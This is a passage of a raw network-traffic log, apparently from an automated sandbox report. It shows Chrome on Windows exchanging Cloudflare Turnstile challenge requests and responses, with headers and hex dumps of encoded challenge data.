68 6b 67 42 5a 51 4d
                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g9lt0nmOA89C-hkc3Ejs8rLpciNNl7YUTkHw4H3JWIcQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                2025-01-13 19:54:53 UTC1INData Raw: 4a
                                                                Data Ascii: J


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.549736104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:54 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/9017f0c19bf64357/1736798092091/WvlYSSUVjyD9zH9 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:54 UTC200INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:54 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0d85abc8ca1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 2e 08 02 00 00 00 71 af 74 f4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDR.qtIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.549737104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:54 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/9017f0c19bf64357/1736798092091/WvlYSSUVjyD9zH9 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:55 UTC200INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:55 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0ddac32435e-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 2e 08 02 00 00 00 71 af 74 f4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDR.qtIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.549738104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:55 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 32496
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: 60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:55 UTC16384OUTData Raw: 76 5f 39 30 31 37 66 30 63 31 39 62 66 36 34 33 35 37 3d 7a 45 61 35 42 73 32 2d 62 47 45 6d 45 6d 69 45 32 31 32 47 43 38 61 37 61 78 62 4c 73 47 6d 78 6d 50 61 73 71 6c 79 6d 47 74 35 78 54 69 73 4b 6d 4f 73 6d 4c 56 35 6d 71 6d 4e 48 35 31 45 32 67 6d 24 35 5a 32 50 43 42 24 54 35 6d 25 32 62 35 32 2d 6d 78 35 31 70 73 75 73 56 4c 2d 46 6d 47 5a 4c 4b 51 73 4d 4c 73 31 5a 59 6d 4d 59 69 6d 2d 35 24 30 6e 30 6d 47 6c 52 57 6d 49 66 77 24 69 69 31 6d 6d 54 62 6d 59 66 6d 6d 59 43 42 56 32 44 4a 56 6d 6a 73 4b 47 53 43 6e 45 6d 70 4b 7a 65 31 6a 73 61 68 35 6d 4d 43 64 47 6d 45 37 30 4d 75 6d 32 42 78 30 45 51 78 5a 56 4d 37 6d 32 4c 6d 7a 61 31 54 68 49 63 75 24 4d 47 52 6e 79 72 35 62 32 7a 54 77 6a 4b 33 41 41 4a 6f 41 44 2d 69 68 72 64 6e 77 2b 58 49
                                                                Data Ascii: v_9017f0c19bf64357=zEa5Bs2-bGEmEmiE212GC8a7axbLsGmxmPasqlymGt5xTisKmOsmLV5mqmNH51E2gm$5Z2PCB$T5m%2b52-mx51psusVL-FmGZLKQsMLs1ZYmMYim-5$0n0mGlRWmIfw$ii1mmTbmYfmmYCBV2DJVmjsKGSCnEmpKze1jsah5mMCdGmE70Mum2Bx0EQxZVM7m2Lmza1ThIcu$MGRnyr5b2zTwjK3AAJoAD-ihrdnw+XI
                                                                2025-01-13 19:54:55 UTC16112OUTData Raw: 6d 24 6d 73 45 31 73 4f 61 6d 2d 6d 5a 44 38 56 47 35 78 47 4c 61 32 7a 35 39 6d 78 5a 32 75 6d 4e 35 47 5a 4c 66 5a 4f 6d 61 61 6d 64 6d 65 64 4c 61 6d 57 6d 77 45 73 6d 73 41 6d 75 35 7a 62 73 53 6d 54 6d 6a 33 2b 75 6d 33 35 4d 54 32 56 6d 52 35 78 47 32 37 35 57 4e 6f 5a 32 78 35 30 6d 50 44 32 32 5a 6c 35 32 78 6d 61 6d 66 47 24 6c 73 57 56 2b 6d 37 37 73 62 6d 62 62 4f 66 73 62 6d 32 45 6d 31 6d 39 6d 42 48 61 56 32 6f 5a 2b 6d 75 45 6d 46 6d 4b 35 24 4a 6d 73 6d 24 6d 49 56 31 4b 6d 7a 6d 55 56 31 47 32 61 6d 61 70 32 47 32 6a 6d 67 5a 31 4b 6d 36 6d 33 56 78 43 32 54 6d 6a 56 78 69 32 31 35 61 61 78 47 32 77 6d 39 5a 24 50 46 68 6d 39 61 31 72 32 30 35 55 5a 31 79 32 56 35 51 61 75 64 32 4b 35 67 45 32 72 6d 50 6d 4a 35 6d 48 6d 76 6d 37 37 6d 37
                                                                Data Ascii: m$msE1sOam-mZD8VG5xGLa2z59mxZ2umN5GZLfZOmaamdmedLamWmwEsmsAmu5zbsSmTmj3+um35MT2VmR5xG275WNoZ2x50mPD22Zl52xmamfG$lsWV+m77sbmbbOfsbm2Em1m9mBHaV2oZ+muEmFmK5$Jmsm$mIV1KmzmUV1G2amap2G2jmgZ1Km6m3VxC2TmjVxi215aaxG2wm9Z$PFhm9a1r205UZ1y2V5Qaud2K5gE2rmPmJ5mHmvm77m7
                                                                2025-01-13 19:54:55 UTC322INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:55 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 26316
                                                                Connection: close
                                                                cf-chl-gen: GwNhoL/lSjUx3WdiOJbcINBxOVBdnzBs07yvLSwBZxCbIowugEiSNJoIYq0ImkQm$tiEe7H8alCHZwQ0j60fr/g==
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0e21f6b6a56-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:55 UTC1047INData Raw: 6b 63 56 33 74 4a 53 66 73 35 2b 58 6c 4d 4f 6c 6a 34 2b 6e 79 4b 32 6f 77 71 57 51 69 71 53 70 6c 4a 7a 47 78 74 36 67 7a 74 36 69 30 2b 43 76 33 62 48 42 78 5a 33 70 78 63 4f 37 75 4e 36 39 36 61 76 6d 79 4c 4c 7a 35 75 4f 36 35 2f 4c 74 75 4e 66 52 36 39 72 57 7a 65 50 53 34 73 41 4a 33 2f 55 48 32 51 66 73 41 2b 6a 4e 36 51 4d 48 30 2f 45 55 31 42 4c 6c 2b 51 6e 70 2b 2f 48 75 49 42 2f 37 4a 67 4c 38 4b 75 54 71 41 66 67 65 35 76 76 35 48 41 6a 78 2f 53 58 32 4e 79 2f 33 43 69 76 30 47 41 6f 5a 39 2f 37 31 50 78 78 43 49 68 30 45 47 41 59 69 53 7a 41 68 53 69 51 70 45 69 74 51 53 42 42 5a 4e 30 6b 55 50 68 30 58 58 68 68 43 4e 6a 70 43 58 6a 6b 79 57 54 5a 4c 4f 6b 59 70 57 44 34 36 4f 6b 39 41 64 54 42 69 61 45 45 79 53 33 56 6f 65 57 74 52 56 45 42
                                                                Data Ascii: kcV3tJSfs5+XlMOlj4+nyK2owqWQiqSplJzGxt6gzt6i0+Cv3bHBxZ3pxcO7uN696avmyLLz5uO65/LtuNfR69rWzePS4sAJ3/UH2QfsA+jN6QMH0/EU1BLl+Qnp+/HuIB/7JgL8KuTqAfge5vv5HAjx/SX2Ny/3Civ0GAoZ9/71PxxCIh0EGAYiSzAhSiQpEitQSBBZN0kUPh0XXhhCNjpCXjkyWTZLOkYpWD46Ok9AdTBiaEEyS3VoeWtRVEB
                                                                2025-01-13 19:54:55 UTC1369INData Raw: 49 6f 4d 2b 74 32 70 66 50 71 62 6a 54 6d 36 72 4c 73 74 66 63 6e 65 6e 4b 77 39 37 65 77 4e 2f 6a 32 4b 72 49 36 75 2f 4b 72 65 66 53 73 4e 44 79 74 64 7a 4c 38 67 44 66 30 4c 72 54 34 4f 36 39 43 64 73 48 36 51 72 46 41 2b 2f 67 41 67 44 6b 79 2b 55 4d 30 2b 44 33 45 78 33 32 35 64 62 30 33 78 4d 65 37 2f 44 58 42 51 59 47 49 69 44 6b 49 79 44 34 41 53 38 51 41 53 67 68 37 50 4c 7a 42 51 33 33 42 41 62 39 4f 66 55 37 2b 68 45 56 45 41 45 6f 41 55 4d 30 43 52 73 32 48 54 38 61 51 53 41 63 45 42 41 6a 51 46 46 49 57 43 73 38 50 54 30 65 57 45 78 67 4e 6a 41 68 50 6a 70 43 49 45 6b 35 58 56 59 72 54 54 30 6e 4c 44 78 48 53 7a 46 73 4d 6a 64 4f 54 30 31 62 4e 48 46 7a 59 47 78 5a 64 6e 64 42 57 48 79 46 64 59 64 6c 59 31 35 76 58 56 42 6a 63 4a 52 6e 67 5a
                                                                Data Ascii: IoM+t2pfPqbjTm6rLstfcnenKw97ewN/j2KrI6u/KrefSsNDytdzL8gDf0LrT4O69CdsH6QrFA+/gAgDky+UM0+D3Ex325db03xMe7/DXBQYGIiDkIyD4AS8QASgh7PLzBQ33BAb9OfU7+hEVEAEoAUM0CRs2HT8aQSAcEBAjQFFIWCs8PT0eWExgNjAhPjpCIEk5XVYrTT0nLDxHSzFsMjdOT01bNHFzYGxZdndBWHyFdYdlY15vXVBjcJRngZ
                                                                2025-01-13 19:54:55 UTC1369INData Raw: 6d 4c 58 4e 79 39 6a 52 34 4b 54 6a 6f 39 6d 66 77 36 6a 41 33 62 61 38 76 74 76 41 71 64 37 44 71 4f 4b 78 79 65 50 33 38 4c 50 37 2b 4e 6f 44 75 64 69 39 76 67 58 57 77 51 58 41 78 67 66 37 41 64 7a 76 41 41 62 2b 41 4f 50 4d 37 39 48 51 47 77 55 54 38 76 30 4c 49 68 4c 74 2f 74 6f 46 38 67 62 38 41 4f 66 35 36 2b 6b 4a 4d 65 38 6e 46 43 41 50 49 75 37 30 4d 41 34 35 37 52 77 30 2b 44 59 39 51 52 63 52 48 53 38 63 51 42 45 6d 46 7a 6f 45 4a 68 6b 72 47 53 6b 79 44 67 38 56 4d 54 41 59 4e 42 63 71 50 52 51 7a 59 55 49 33 4f 44 38 2b 51 6a 74 6f 50 6a 74 72 50 44 64 76 5a 47 46 68 4d 6a 4a 66 64 6d 41 7a 4f 48 67 30 62 6c 56 57 64 32 70 55 56 33 4a 63 62 6d 4e 41 68 58 39 37 53 6e 79 49 67 31 70 74 63 56 39 71 57 30 74 54 62 57 32 49 6c 47 64 30 68 58 70
                                                                Data Ascii: mLXNy9jR4KTjo9mfw6jA3ba8vtvAqd7DqOKxyeP38LP7+NoDudi9vgXWwQXAxgf7AdzvAAb+AOPM79HQGwUT8v0LIhLt/toF8gb8AOf56+kJMe8nFCAPIu70MA457Rw0+DY9QRcRHS8cQBEmFzoEJhkrGSkyDg8VMTAYNBcqPRQzYUI3OD8+QjtoPjtrPDdvZGFhMjJfdmAzOHg0blVWd2pUV3JcbmNAhX97SnyIg1ptcV9qW0tTbW2IlGd0hXp
                                                                2025-01-13 19:54:55 UTC1369INData Raw: 72 75 35 33 72 43 79 34 63 4c 6d 35 39 72 67 77 4f 4c 67 76 65 66 31 38 65 76 35 39 4d 2f 52 73 73 58 6d 30 76 6e 78 2b 39 6a 38 37 74 6e 37 39 76 48 70 76 63 6b 44 78 77 6a 68 35 68 50 2b 45 76 48 51 41 77 49 4c 31 42 73 55 43 68 44 33 48 78 50 76 37 52 63 51 39 76 44 66 43 76 6f 72 43 43 6e 6d 4b 2b 77 6a 37 79 73 4f 4a 2b 7a 32 38 51 67 34 45 52 59 74 50 54 63 4f 50 68 73 55 48 42 34 46 43 44 6b 65 51 43 63 6d 51 69 73 39 4c 41 6b 2b 4d 77 78 4f 4c 69 34 71 4a 78 74 58 4e 56 4d 72 46 6b 31 62 4e 44 30 6a 50 57 59 66 50 56 4d 36 58 45 49 70 5a 53 70 51 4b 69 31 47 63 33 46 32 55 79 73 34 53 57 31 50 65 56 67 32 54 6e 74 7a 54 6b 39 78 50 6b 43 44 61 47 46 58 56 32 36 4f 53 34 31 52 58 6d 46 2b 59 35 43 47 56 70 68 57 65 48 69 48 65 6e 57 59 66 47 74 67
                                                                Data Ascii: ru53rCy4cLm59rgwOLgvef18ev59M/RssXm0vnx+9j87tn79vHpvckDxwjh5hP+EvHQAwIL1BsUChD3HxPv7RcQ9vDfCvorCCnmK+wj7ysOJ+z28Qg4ERYtPTcOPhsUHB4FCDkeQCcmQis9LAk+MwxOLi4qJxtXNVMrFk1bND0jPWYfPVM6XEIpZSpQKi1Gc3F2Uys4SW1PeVg2TntzTk9xPkCDaGFXV26OS41RXmF+Y5CGVphWeHiHenWYfGtg
                                                                2025-01-13 19:54:55 UTC1369INData Raw: 69 72 35 75 37 6f 79 73 62 4f 73 37 47 74 36 65 44 4c 39 2f 62 50 75 36 2f 31 79 64 54 62 75 4e 7a 50 78 4d 55 48 30 38 48 53 2b 4f 66 44 78 4f 73 44 7a 67 41 51 79 67 45 44 44 4e 59 4e 47 42 58 57 36 68 33 75 2b 68 4c 75 42 43 4d 44 39 42 73 58 35 41 62 70 35 79 41 6f 45 42 6f 6d 45 7a 51 55 39 53 7a 79 4b 67 7a 33 37 51 72 38 4b 54 77 75 47 6a 30 62 2b 2f 73 76 41 52 49 36 50 41 63 2f 49 42 64 4f 4a 55 51 62 4b 79 6b 78 4b 6c 56 4f 46 52 46 4b 56 30 38 76 4b 55 46 5a 4d 6c 45 6b 52 6a 5a 6f 4e 57 4d 2b 52 46 64 57 50 31 38 6f 5a 6a 4d 38 59 7a 38 2f 55 6b 46 44 53 33 6b 37 4e 30 70 74 63 31 52 55 67 54 78 51 4f 56 42 33 66 6c 6d 4c 65 33 74 68 57 6f 65 43 59 4a 4f 54 67 47 56 76 56 4a 46 6a 64 6f 64 77 62 6e 69 62 62 57 4f 68 58 49 39 76 70 5a 4f 58 64
                                                                Data Ascii: ir5u7oysbOs7Gt6eDL9/bPu6/1ydTbuNzPxMUH08HS+OfDxOsDzgAQygEDDNYNGBXW6h3u+hLuBCMD9BsX5Abp5yAoEBomEzQU9SzyKgz37Qr8KTwuGj0b+/svARI6PAc/IBdOJUQbKykxKlVOFRFKV08vKUFZMlEkRjZoNWM+RFdWP18oZjM8Yz8/UkFDS3k7N0ptc1RUgTxQOVB3flmLe3thWoeCYJOTgGVvVJFjdodwbnibbWOhXI9vpZOXd
                                                                2025-01-13 19:54:55 UTC1369INData Raw: 47 72 65 61 73 34 71 37 6d 73 76 44 4b 74 4c 50 75 39 64 62 56 32 72 34 41 75 2f 58 58 38 41 6a 36 37 4e 33 44 43 64 2f 71 35 67 51 47 43 4e 48 77 43 51 54 71 38 67 33 62 33 50 50 2b 46 50 54 38 4a 65 54 75 2f 51 4d 62 4b 78 63 48 42 75 73 4a 2b 68 6b 67 49 42 50 6d 43 43 58 79 4f 41 55 72 39 65 34 4b 4c 6a 6b 4c 45 7a 55 35 39 6b 51 32 47 41 49 67 4a 53 67 64 43 79 59 48 4a 68 77 71 49 7a 49 53 4b 31 6b 74 47 44 56 4e 53 43 39 4c 46 30 38 62 57 54 4d 64 48 46 64 65 50 7a 35 44 4a 32 67 6b 58 6b 42 5a 63 47 4e 56 52 69 78 78 53 46 4e 50 62 47 35 76 4e 46 61 42 4f 54 70 76 58 31 6d 48 58 33 6c 4a 58 47 52 72 69 46 35 6b 69 46 70 53 67 45 2b 4e 59 59 68 6b 62 32 32 49 56 33 64 73 6d 58 43 56 66 4a 42 69 62 33 4b 59 69 47 56 37 6c 34 65 42 72 34 56 6e 68 58
                                                                Data Ascii: Greas4q7msvDKtLPu9dbV2r4Au/XX8Aj67N3DCd/q5gQGCNHwCQTq8g3b3PP+FPT8JeTu/QMbKxcHBusJ+hkgIBPmCCXyOAUr9e4KLjkLEzU59kQ2GAIgJSgdCyYHJhwqIzISK1ktGDVNSC9LF08bWTMdHFdePz5DJ2gkXkBZcGNVRixxSFNPbG5vNFaBOTpvX1mHX3lJXGRriF5kiFpSgE+NYYhkb22IV3dsmXCVfJBib3KYiGV7l4eBr4VnhX
                                                                2025-01-13 19:54:55 UTC1369INData Raw: 75 4e 4c 47 2b 72 50 58 32 39 48 4a 32 50 51 41 7a 39 7a 69 78 37 2f 67 2f 64 33 61 35 67 45 4c 7a 75 6b 47 35 4e 48 75 34 68 6a 69 38 76 66 35 35 2f 51 52 45 39 2f 34 4a 53 44 76 2f 67 50 6b 38 77 51 48 37 50 63 47 2b 6a 44 36 43 6a 55 77 2f 51 34 71 42 67 63 53 50 66 50 76 46 55 45 33 38 78 6e 36 45 67 34 65 46 43 55 41 49 68 67 57 46 79 59 72 51 77 51 70 52 52 55 67 4d 44 4d 59 46 6a 49 54 4b 69 59 33 4f 79 41 69 4f 31 59 32 4d 7a 38 7a 4b 42 78 42 58 57 77 32 52 30 74 6b 4f 30 74 51 55 6a 35 50 51 7a 41 73 55 6b 64 33 50 6c 5a 4c 67 45 78 63 59 45 30 34 58 33 6d 45 55 32 47 4e 53 45 70 6e 67 5a 42 66 61 31 2b 51 58 32 39 30 59 55 78 79 6e 5a 42 6e 64 6e 78 39 59 6e 74 2f 6d 32 5a 2b 6d 61 68 30 67 5a 35 35 61 34 69 4c 63 48 47 4b 70 57 78 73 6a 34 53
                                                                Data Ascii: uNLG+rPX29HJ2PQAz9zix7/g/d3a5gELzukG5NHu4hji8vf55/QRE9/4JSDv/gPk8wQH7PcG+jD6CjUw/Q4qBgcSPfPvFUE38xn6Eg4eFCUAIhgWFyYrQwQpRRUgMDMYFjITKiY3OyAiO1Y2Mz8zKBxBXWw2R0tkO0tQUj5PQzAsUkd3PlZLgExcYE04X3mEU2GNSEpngZBfa1+QX290YUxynZBndnx9Ynt/m2Z+mah0gZ55a4iLcHGKpWxsj4S
                                                                2025-01-13 19:54:55 UTC1369INData Raw: 74 62 30 33 4d 44 7a 31 39 2f 76 75 75 6b 44 78 2b 33 66 35 2f 66 4a 38 51 76 50 39 65 66 76 41 4f 7a 53 46 4f 66 36 44 2f 4d 57 36 66 49 5a 32 67 48 62 41 52 2f 2b 38 51 55 55 41 76 6f 48 49 76 6b 45 4a 65 37 39 42 79 33 75 46 65 38 53 38 6a 51 4c 4e 52 73 69 39 78 30 73 47 68 4d 2f 4a 45 56 43 50 51 4e 42 53 43 6b 4e 53 53 31 4c 4d 46 46 51 4d 55 70 51 4a 31 46 64 52 56 49 34 53 45 45 62 57 6b 42 44 57 54 78 67 57 44 64 6a 4e 30 34 6b 53 56 68 63 50 32 70 41 62 45 4e 75 65 57 46 79 56 47 52 7a 4e 33 64 63 58 33 6c 59 66 49 52 54 67 46 4e 71 51 47 56 30 5a 6c 75 46 62 49 68 4c 6a 57 57 45 58 34 71 4a 65 6c 42 31 68 4a 78 72 6d 58 47 51 61 35 61 57 6e 48 4f 68 65 5a 68 30 6e 70 32 4f 5a 49 6d 59 70 48 2b 74 68 61 53 41 71 71 71 77 68 37 57 4e 71 33 53 79
                                                                Data Ascii: tb03MDz19/vuukDx+3f5/fJ8QvP9efvAOzSFOf6D/MW6fIZ2gHbAR/+8QUUAvoHIvkEJe79By3uFe8S8jQLNRsi9x0sGhM/JEVCPQNBSCkNSS1LMFFQMUpQJ1FdRVI4SEEbWkBDWTxgWDdjN04kSVhcP2pAbENueWFyVGRzN3dcX3lYfIRTgFNqQGV0ZluFbIhLjWWEX4qJelB1hJxrmXGQa5aWnHOheZh0np2OZImYpH+thaSAqqqwh7WNq3Sy


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.549739104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:56 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:56 UTC375INHTTP/1.1 404 Not Found
                                                                Date: Mon, 13 Jan 2025 19:54:56 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 7
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                cf-chl-out: p0c/ezzGGc7ZuCnArU2LMw==$X2YlRT2yCtVmnJ20U6dcyw==
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0e79f1ac46d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                Data Ascii: invalid


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.549781104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:55:06 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 34908
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: 60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:55:06 UTC16384OUTData Raw: 76 5f 39 30 31 37 66 30 63 31 39 62 66 36 34 33 35 37 3d 7a 45 61 35 42 73 32 2d 62 47 45 6d 45 6d 69 45 32 31 32 47 43 38 61 37 61 78 62 4c 73 47 6d 78 6d 50 61 73 71 6c 79 6d 47 74 35 78 54 69 73 4b 6d 4f 73 6d 4c 56 35 6d 71 6d 4e 48 35 31 45 32 67 6d 24 35 5a 32 50 43 42 24 54 35 6d 25 32 62 35 32 2d 6d 78 35 31 70 73 75 73 56 4c 2d 46 6d 47 5a 4c 4b 51 73 4d 4c 73 31 5a 59 6d 4d 59 69 6d 2d 35 24 30 6e 30 6d 47 6c 52 57 6d 49 66 77 24 69 69 31 6d 6d 54 62 6d 59 66 6d 6d 59 43 42 56 32 44 4a 56 6d 6a 73 4b 47 53 43 6e 45 6d 70 4b 7a 65 31 6a 73 61 68 35 6d 4d 43 64 47 6d 45 37 30 4d 75 6d 32 42 78 30 45 51 78 5a 56 4d 37 6d 32 4c 6d 7a 61 31 54 68 49 63 75 24 4d 47 52 6e 79 72 35 62 32 7a 54 77 6a 4b 33 41 41 4a 6f 41 44 2d 69 68 72 64 6e 77 2b 58 49
                                                                Data Ascii: v_9017f0c19bf64357=zEa5Bs2-bGEmEmiE212GC8a7axbLsGmxmPasqlymGt5xTisKmOsmLV5mqmNH51E2gm$5Z2PCB$T5m%2b52-mx51psusVL-FmGZLKQsMLs1ZYmMYim-5$0n0mGlRWmIfw$ii1mmTbmYfmmYCBV2DJVmjsKGSCnEmpKze1jsah5mMCdGmE70Mum2Bx0EQxZVM7m2Lmza1ThIcu$MGRnyr5b2zTwjK3AAJoAD-ihrdnw+XI
